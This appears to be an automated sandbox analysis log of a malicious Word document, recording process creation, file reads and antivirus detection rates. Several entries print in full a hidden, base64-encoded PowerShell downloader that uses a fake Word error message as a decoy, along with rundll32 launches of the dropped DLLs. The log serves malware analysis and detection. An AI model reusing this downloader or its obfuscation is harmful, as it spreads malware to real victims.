Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j..... ................X.............}..v.....!......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............Q..j....@J_...............X.............}..v.....'......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j.....(................X.............}..v.....)......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............Q..j....@J_...............X.............}..v...../......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j.....0................X.............}..v.....1......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............Q..j....@J_...............X.............}..v.....7......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....8................X.............}..v.....9......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............Q..j......................X.............}..v.....?......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....@................X.............}..v.....A......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............Q..j....@J_...............X.............}..v.....G......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j.....H................X.............}..v.....I......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............Q..j....@J_...............X.............}..v.....O......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j.....P................X.............}..v.....Q......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............Q..j....@J_...............X.............}..v.....W......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j.....X................X.............}..v.....Y......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v....._......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....`................X.............}..v.....a......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.F.....................Q..j....@J_...............X.............}..v.....g......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....h................X.............}..v.....i......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v.....o......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....p................X.............}..v.....q......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v.....w......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....x................X.............}..v.....y......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....p.................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../...............Q..j....@J_...............X.............}..v....@.......0.......................r.......0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j......................X.............}..v....x.......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;....... .......Q..j....@J_...............X.............}..v............0................F_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;..................j......................X.............}..v....@.......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................J.j....E.................X.............}..v......&.....0...............X._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................J.j....E.................X.............}..v.... R&.....0...............X._.............0...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1

Source: DAT.doc	Virustotal: Detection: 71%
Source: DAT.doc	ReversingLabs: Detection: 82%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQ